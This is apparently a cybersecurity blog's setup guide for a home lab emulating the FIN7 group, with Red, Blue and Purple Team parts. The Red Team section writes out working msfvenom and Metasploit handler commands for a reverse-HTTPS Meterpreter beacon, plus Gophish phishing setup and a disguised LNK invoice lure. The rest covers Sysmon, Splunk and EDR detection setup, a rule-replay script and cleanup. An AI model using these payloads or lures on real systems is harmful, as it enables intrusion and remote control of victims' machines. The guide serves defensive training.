
02-Endpoint-Threat-Detection: Setup-Guide

  • Writer: TrilloSec
  • Feb 23
  • 4 min read


1️⃣ Lab Overview

Purpose

This experiment will evaluate the ability to detect, analyze, and respond to a simulated cyber attack inspired by real-world APTs. It will demonstrate hands-on cybersecurity skills in a home lab, focusing on professional-grade reporting (Red Team, Blue Team, Purple Team) while navigating real-world technical constraints.


APT Overview: The simulation is inspired by FIN7 (aka Carbanak, Navigator Group, Anunak), a financially motivated group known for targeting financial institutions, retail, and hospitality. The emulation reproduces FIN7's reliance on spear-phishing, Living-off-the-Land (LOTL) techniques, and fileless malware to evade detection and maintain long-term persistence. The group has been linked to over $1 billion in stolen funds through POS system breaches, credential theft, and custom C2 frameworks. Despite law enforcement action, FIN7 remains active and continues to evolve its methods.


Red Team Overview: The Red Team will simulate FIN7’s initial access and execution tactics by crafting a malicious LNK file disguised as a financial document. Upon execution, the payload will leverage PowerShell and LOLBins (mshta.exe, rundll32.exe) to bypass defenses and establish a C2 connection via Meterpreter. The attack chain will include registry-based persistence and simulated end-stage actions to demonstrate the group's emphasis on stealth, persistence, and financial data theft.


Blue Team Overview: The Blue Team will focus on detecting and mitigating FIN7’s techniques using a combination of Sysmon, LimaCharlie EDR, and Splunk ES. Defensive efforts will include process creation monitoring, registry modification alerts, and network connection detections. Baseline assessments are expected to reveal detection gaps for payload execution and persistence mechanisms. Subsequent improvements will aim to achieve sub-minute detection times, enhance C2 communication visibility, and increase containment rates, improving the organization’s overall security posture.


Purple Team Overview: The Purple Team will integrate findings from the Red and Blue Team efforts to assess security effectiveness and refine defensive strategies. Key objectives will include quantifying phishing success rates, measuring detection rule efficiency, and identifying security gaps requiring further mitigation. Results will be documented in a structured format tailored for CISO-level decision-making, ensuring actionable insights while considering the practical constraints of a home lab environment.


  • Objective: Simulate an endpoint threat detection scenario inspired by the FIN7 APT group, focusing on initial access, execution, and persistence.

  • Tools Used:

    • 🟥 Red Team: Metasploit, MSFvenom, Gophish, Sliver, Empire, custom payloads

    • 🔵 Blue Team: Sysmon, LimaCharlie EDR, Splunk ES, YARA, Sigma

    • 🟣 Purple Team: MITRE ATT&CK Navigator, Splunk, Sigma converters, detection engineering scripts



2️⃣ Lab Environment Setup

2.1 Virtual Machines

VM Name          | OS                       | Purpose                                  | Tools Installed
-----------------|--------------------------|------------------------------------------|------------------------------------
red-c2-kali      | Kali Linux Rolling       | Red Team Attack Box                      | Metasploit, Sliver, Empire, Gophish
red-dev-shiva    | Windows 10               | Red Team Payload Development             | PowerShell, Notepad
blue-edr-bob     | Windows 10/11 Pro        | Blue Team Endpoint (Target Workstation)  | Sysmon, Splunk UF, LimaCharlie EDR
blue-siem-hermes | Ubuntu Desktop 22.04 LTS | SIEM & Log Collection                    | Splunk ES, Sigma
blue-soc-artemis | Ubuntu Desktop 22.04 LTS | SOC Analyst Workstation (Threat Hunting) | Sigma, YARA, Wireshark

💡 Notes:

  • Host: macOS running Parallels with 2.4 GHz 8-Core Intel i9, 64 GB RAM, and 2 TB SSD.

  • Splunk VM requires 16GB RAM minimum due to log processing load.

  • Adjust resource allocation if the host machine slows down.



3️⃣ Red Team Setup

3.1 Install & Configure Gophish (Phishing Simulation)

Gophish is shipped as a release archive on its GitHub releases page rather than through the Kali package repositories, so fetch the Linux 64-bit build from there and run it from the extracted directory:

# On red-c2-kali (archive name follows the gophish-vX.Y.Z-linux-64bit.zip release pattern):
unzip gophish-v*-linux-64bit.zip -d ~/gophish && cd ~/gophish
chmod +x gophish && sudo ./gophish
  • The admin UI listens on https://127.0.0.1:3333 by default (admin_server.listen_url in config.json); the initial admin password is printed to the terminal on first start.

  • The phishing server binds 0.0.0.0:80 by default, which is why it runs under sudo; set phish_server.listen_url to Kali's lab address (10.26.0.9) if the landing page should only be reachable from the lab network.

3.2 Payload Generation

Create the LNK payload on red-dev-shiva:

notepad lnk_creator.ps1
# (Insert script from project workbook)
  • Move Fake_Invoice_2024.pdf.lnk to Kali and compress it. The double extension works because Explorer never displays the .lnk suffix, and the archive is what gets attached to the Gophish template:

zip bait.zip Fake_Invoice_2024.pdf.lnk

Generate the Meterpreter beacon with MSFvenom. 10.26.0.9 is red-c2-kali; meterpreter_reverse_https is the stageless variant, so the whole payload is inside the EXE and no second stage is fetched over the wire:

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.26.0.9 LPORT=443 -f exe -o kevin_beacon.exe

Start the Metasploit listener. Binding port 443 needs root on Kali, ExitOnSession false keeps the handler alive across repeated test runs, and the handler payload must match the msfvenom payload exactly (stageless with stageless):

sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter_reverse_https; set LHOST 10.26.0.9; set LPORT 443; set ExitOnSession false; exploit -j"


4️⃣ Blue Team Setup

4.1 Sysmon Configuration on blue-edr-bob

sysmon64.exe -accepteula -i sysmon-config.xml
  • Start from a community configuration (SwiftOnSecurity's sysmon-config is the usual baseline) and make sure the following event types are not filtered out for the binaries in the attack chain (powershell.exe, mshta.exe, rundll32.exe, and anything running from C:\Users\Public):

    • Process Creation (Event ID 1), with ParentImage and CommandLine intact

    • Registry Value Set (Event ID 13) for the HKCU and HKLM ...\CurrentVersion\Run keys

    • Network Connections (Event ID 3), which Sysmon does not log by default and which need an explicit NetworkConnect rule in the XML

  • Confirm events are flowing before the test, e.g. in PowerShell: Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 5

4.2 Splunk Setup on blue-siem-hermes

sudo /opt/splunk/bin/splunk start
sudo /opt/splunk/bin/splunk enable listen 9997
  • Create indices: sysmon_logs, edr_logs (Settings > Indexes in Splunk Web, or splunk add index sysmon_logs from the CLI).

  • Install the Splunk Universal Forwarder on Bob from an elevated prompt and point it at Hermes on port 9997 (the MSI filename is version-specific; use the Hermes IP if the lab has no DNS):

msiexec.exe /i splunkforwarder-x64.msi AGREETOLICENSE=Yes RECEIVING_INDEXER="blue-siem-hermes:9997" /quiet
"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" restart
  • Sysmon writes to the Microsoft-Windows-Sysmon/Operational event channel, not to loose files, so collect it with a Windows event log input rather than a file monitor of C:\Windows\System32\winevt\Logs: add a [WinEventLog://Microsoft-Windows-Sysmon/Operational] stanza with index = sysmon_logs and renderXml = true to the forwarder's inputs.conf before the restart above.

4.3 LimaCharlie EDR Setup

LimaCharlie enrolls a sensor with an installation key generated in the web console; the key is passed to the Windows sensor installer, which is also downloaded from the console:

# On blue-edr-bob, from an elevated prompt:
<lc_sensor_installer>.exe -i <installation_key>
  • Detection & Response (D&R) rules are YAML documents with a detect section (the match logic) and a respond section (report, tag, isolate the host, and so on). Add them from the web console or with the limacharlie Python CLI, and keep the edr_rules.yaml source under version control so the Purple Team can diff rule changes between runs.


5️⃣ Testing the Attack

  1. Pre-Test Phase: run the attack chain once with no custom detection rules loaded (stock Sysmon config, no Splunk alerts, no LimaCharlie D&R rules) and record what each sensor captured and when. This is the baseline.

  2. Deploy Blue Team Detection Rules:

    • Apply the tuned Sysmon XML configuration (sysmon64.exe -c sysmon-config.xml updates the running config without reinstalling).

    • Convert Sigma rules to Splunk searches and save them as scheduled alerts; load YARA rules and D&R rules into LimaCharlie.

  3. Post-Test Phase: re-run the same chain from the same VM snapshot and measure time-to-detect (first alert minus LNK execution) and which stages (execution, persistence, C2) each rule caught.
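The baseline-versus-tuned comparison above, and the three Sysmon event types from 4.1, can be rehearsed offline before touching the lab. The script below is an added example, not part of the TrilloSec workbook or of any tool listed on this page: it replays constructed Sysmon-style events (the LNK -> PowerShell -> mshta chain, the AdobeFakeUpdate Run key, the kevin_beacon.exe connection to 10.26.0.9:443, with benign noise mixed in) through three rules derived from the Blue Team Overview, once with no rules (the pre-test baseline) and once with them, and reports time-to-detect. The hostnames, timestamps, SID, file paths and benign events are all constructed; the predicates are the same logic you would express as an SPL search or a LimaCharlie D&R rule.

```python
"""Added example (not from the TrilloSec workbook or any listed tool): replay
constructed Sysmon-style events through the three detections the guide names
for blue-edr-bob and compare a no-rules baseline with the tuned run."""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Optional


@dataclass
class SysmonEvent:
    """One Sysmon event as it would reach Splunk: ID, UTC time, host, EventData fields."""
    event_id: int
    utc_time: datetime
    host: str
    fields: dict


# Binaries the Red Team chain uses, user-facing apps an LNK or attachment is launched
# from, and directories a dropped beacon would run from. Constructed lists.
LOLBINS = {"powershell.exe", "mshta.exe", "rundll32.exe"}
USER_APPS = {"explorer.exe", "outlook.exe", "winword.exe", "excel.exe"}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def image_name(path: str) -> str:
    """Lower-case file name from a Sysmon Image/ParentImage path."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_lolbin_parent(e: SysmonEvent) -> bool:
    """EID 1: LOLBin started by a user application (the LNK double-click) or by
    another LOLBin (PowerShell -> mshta/rundll32). OS-initiated rundll32 under
    svchost.exe does not match, which keeps the rule quiet on a normal desktop."""
    return (e.event_id == 1
            and image_name(e.fields["Image"]) in LOLBINS
            and image_name(e.fields["ParentImage"]) in USER_APPS | LOLBINS)


def rule_run_key(e: SysmonEvent) -> bool:
    """EID 13: a value set under a CurrentVersion Run or RunOnce key."""
    return (e.event_id == 13
            and "\\microsoft\\windows\\currentversion\\run" in e.fields["TargetObject"].lower())


def rule_suspicious_egress(e: SysmonEvent) -> bool:
    """EID 3: outbound connection initiated by a LOLBin or by a binary running from
    a user-writable directory (where kevin_beacon.exe is dropped)."""
    if e.event_id != 3 or e.fields.get("Initiated") != "true":
        return False
    image = e.fields["Image"].lower()
    return image_name(image) in LOLBINS or image.startswith(USER_WRITABLE)


RULES = {
    "T1204.002 LOLBin spawned by user app or LOLBin": rule_lolbin_parent,
    "T1547.001 Run key persistence": rule_run_key,
    "T1071.001 suspicious outbound connection": rule_suspicious_egress,
}


@dataclass
class RunResult:
    detections: list = field(default_factory=list)  # (rule name, event) in time order
    time_to_detect: Optional[timedelta] = None      # first alert minus attack start


def replay(events, rules, attack_start: datetime) -> RunResult:
    """Evaluate every rule against every event in time order; time_to_detect is
    measured from the attacker's first action to the first rule that fires."""
    result = RunResult()
    for e in sorted(events, key=lambda ev: ev.utc_time):
        for name, rule in rules.items():
            if rule(e):
                result.detections.append((name, e))
                if result.time_to_detect is None:
                    result.time_to_detect = e.utc_time - attack_start
    return result


T0 = datetime(2025, 2, 23, 14, 0, 0)  # constructed: moment the LNK is double-clicked
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def sample_events():
    """Constructed events mirroring the Red Team chain plus benign noise; not real telemetry."""
    h = "blue-edr-bob"
    t = lambda s: T0 + timedelta(seconds=s)
    run_key = ("HKU\\S-1-5-21-1111111111-2222222222-3333333333-1001"  # constructed SID
               r"\Software\Microsoft\Windows\CurrentVersion\Run\AdobeFakeUpdate")
    return [
        SysmonEvent(1, t(1), h, {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe"}),
        SysmonEvent(1, t(2), h, {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": PS}),
        SysmonEvent(1, t(3), h, {"Image": r"C:\Windows\System32\notepad.exe",  # benign
                                 "ParentImage": r"C:\Windows\explorer.exe"}),
        SysmonEvent(13, t(5), h, {"Image": PS, "TargetObject": run_key,
                                  "Details": r"C:\Users\Public\kevin_beacon.exe"}),
        SysmonEvent(3, t(8), h, {"Image": r"C:\Users\Public\kevin_beacon.exe", "Initiated": "true",
                                 "DestinationIp": "10.26.0.9", "DestinationPort": "443"}),
        SysmonEvent(3, t(9), h, {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                                 "Initiated": "true", "DestinationIp": "203.0.113.10",
                                 "DestinationPort": "443"}),  # benign browsing
        SysmonEvent(1, t(12), h, {"Image": r"C:\Windows\System32\rundll32.exe",  # benign, OS-initiated
                                  "ParentImage": r"C:\Windows\System32\svchost.exe"}),
    ]


def run_comparison():
    """Pre-test phase (no rules) versus post-test phase (rules deployed) on the same stream."""
    events = sample_events()
    return replay(events, {}, T0), replay(events, RULES, T0)


if __name__ == "__main__":
    baseline, tuned = run_comparison()
    print(f"baseline: {len(baseline.detections)} detections, TTD={baseline.time_to_detect}")
    print(f"tuned:    {len(tuned.detections)} detections, TTD={tuned.time_to_detect}")
    for name, e in tuned.detections:
        print(f"  {e.utc_time:%H:%M:%S}  EID {e.event_id:<2} {name}")
```

The baseline run returns no detections and no time-to-detect, which is exactly the gap the pre-test phase is meant to document; the tuned run fires on the PowerShell launch one second after the LNK is opened and then on each later stage, while the notepad, Chrome and svchost-spawned rundll32 events stay silent. Swapping the constructed list for events exported from Splunk (the same field names) turns this into a regression check for the rule set between runs.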



6️⃣ Expected Deliverables

Red Team Report: Attack vector details, payload development process, and execution logs.

Blue Team Report: Detection timelines, response actions, and log analysis results.

Purple Team Report: Combined analysis, measurable improvements, and risk reduction summary.



7️⃣ Cleanup & Reset

# On Kali (remove the hosted payload and bait archive)
rm -rf /var/www/html/*

# On Bob (Windows): drop the beacon and its Run-key persistence
Remove-Item -Path "C:\Users\Public\kevin_beacon.exe" -Force
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "AdobeFakeUpdate"

# On Splunk (event data can only be cleaned while splunkd is stopped)
sudo /opt/splunk/bin/splunk stop
sudo /opt/splunk/bin/splunk clean eventdata -f
  • Restore VM snapshots.

  • Archive all logs for future analysis.


📌 Notes & Adjustments

  • Future Work:

    • Automate detection with SOC playbooks.

    • Expand to include Network Threat Detection in future simulations.

  • Enhancements:

    • Add DNS logging (Sysmon Event ID 22, DNS query) and monitor lateral movement.

    • Implement SSL/TLS inspection for deeper C2 detection.




Other Reports in This Project

Red Team: Simulated a FIN7-inspired endpoint attack using LNK payloads, PowerShell execution, and C2 channels to test detection gaps.

Blue Team: Developed Sysmon, Splunk, and LimaCharlie EDR detection rules, reducing detection time to under 1 minute and containment to 5 minutes.

Purple Team: Quantified risk reduction of $58K per incident, aligned defenses with NIST 800-53, ISO 27001, and improved SOC response efficiency.

Setup Guide: Configured attack and defense environments with Gophish, Metasploit, Sysmon, and Splunk for consistent, repeatable testing.

©2025 by TrilloSec.com. All rights reserved.
